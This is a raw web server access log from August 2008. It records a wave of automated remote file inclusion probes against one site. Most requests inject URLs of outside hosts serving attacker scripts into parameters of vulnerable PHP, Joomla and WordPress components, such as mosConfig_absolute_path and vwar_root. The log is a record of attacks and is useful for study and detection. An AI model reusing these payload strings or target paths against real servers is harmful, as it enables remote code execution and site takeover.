216.246.8.237 - - [31/Aug/2008:09:14:44 -0700] "GET /logs/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.212.40 - - [31/Aug/2008:09:14:49 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89716 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.212.40 - - [31/Aug/2008:09:14:55 -0700] "GET /logs/access_080111.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:02 -0700] "GET /logs/access_080401.log/?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:03 -0700] "GET /?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 89462 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:04 -0700] "GET /logs/?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:08 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:08 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:09 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:11 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:11 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:12 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:15:12 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:17 -0700] "GET /logs/access_080401.log/?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:18 -0700] "GET /?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 89462 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:09:15:19 -0700] "GET /logs/?mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:16:00 -0700] "GET /logs/access_080321.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:16:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:16:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:16:17 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:16:24 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:09:16:39 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:16:46 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:16:47 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:12 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:13 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:13 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.174.65.27 - - [31/Aug/2008:09:17:14 -0700] "GET /logs/access_080819.log/inc/header.php/step_one.php?server_inc=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.27 - - [31/Aug/2008:09:17:15 -0700] "GET /inc/header.php/step_one.php?server_inc=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.27 - - [31/Aug/2008:09:17:15 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:17 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
201.6.251.5 - - [31/Aug/2008:09:17:31 -0700] "GET /logs/access_080820.log//includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.251.5 - - [31/Aug/2008:09:17:31 -0700] "GET /logs/access_080820.log//includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.251.5 - - [31/Aug/2008:09:17:32 -0700] "GET //includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.251.5 - - [31/Aug/2008:09:17:33 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.171.245.29 - - [31/Aug/2008:09:17:33 -0700] "GET /logs/access_080528.log//includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.251.5 - - [31/Aug/2008:09:17:37 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:49 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:17:49 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:09:17:53 -0700] "GET /logs/access_071222.log//components/errors.php?error=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:09:17:53 -0700] "GET /logs/access_080226.log//components/errors.php?error=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:09:17:53 -0700] "GET //components/errors.php?error=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:09:17:53 -0700] "GET /logs//components/errors.php?error=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [31/Aug/2008:09:18:00 -0700] "GET /plugins/payment/secpay/lib/nusoap.php?config[root_dir]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:18:57 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:18:58 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:19:12 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:19:13 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:19:25 -0700] "GET /logs/access_080528.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:19:46 -0700] "GET /logs/scripts.log//embed/day.php?path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:19:47 -0700] "GET //embed/day.php?path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:19:47 -0700] "GET /logs//embed/day.php?path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:19:56 -0700] "GET /logs/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:19:57 -0700] "GET /errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [31/Aug/2008:09:19:58 -0700] "GET /logs/access_080711.log//components/errors.php?error=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:19:58 -0700] "GET /logs/access_080820.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:20:12 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:20:33 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:20:34 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:20:34 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.65.27 - - [31/Aug/2008:09:20:37 -0700] "GET /logs/access_080808.log/inc/header.php/step_one.php?server_inc=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:20:37 -0700] "GET /logs/main.php?x=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:09:20:38 -0700] "GET /main.php?x=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:20:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:20:57 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:20:58 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:20:58 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:09:20:58 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:09:21:00 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:09:21:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:09:21:01 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:21:16 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:21:17 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:21:17 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.83.122.149 - - [31/Aug/2008:09:21:19 -0700] "GET /logs/access_080806.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://rezagms.fileave.com/cunprez/peralatanz/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.83.122.149 - - [31/Aug/2008:09:21:20 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://rezagms.fileave.com/cunprez/peralatanz/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.83.122.149 - - [31/Aug/2008:09:21:20 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://rezagms.fileave.com/cunprez/peralatanz/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:09:21:26 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:21:50 -0700] "GET /logs/access_080723.log//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:21:50 -0700] "GET //netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:21:51 -0700] "GET /logs//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:22:01 -0700] "GET /logs/components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.53.231.2 - - [31/Aug/2008:09:22:01 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.83.122.149 - - [31/Aug/2008:09:22:13 -0700] "GET /logs/access_080110.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://rezagms.fileave.com/cunprez/peralatanz/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:22:20 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:22:20 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:22:26 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.40.36 - - [31/Aug/2008:09:22:26 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:09:22:28 -0700] "GET /logs/access_080722.log//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:22:31 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:22:31 -0700] "GET /logs/access_080723.log//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:22:31 -0700] "GET //netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:22:32 -0700] "GET /logs//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:22:32 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:22:33 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:22:41 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:22:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:22:43 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:22:43 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:22:48 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:22:48 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:22:58 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:22:58 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:22:58 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:22:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:09:23:03 -0700] "GET /logs/access_080722.log//netcat/require/errors.php?error=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:23:07 -0700] "GET /logs/access_080127.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:23:07 -0700] "GET /logs/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:23:09 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89716 "-" "libwww-perl/5.811" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:23:21 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:23:30 -0700] "GET /logs/access_080509.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:23:45 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:23:45 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:23:53 -0700] "GET /logs/access_080820.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:23:54 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89886 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:23:55 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:23:55 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:23:55 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
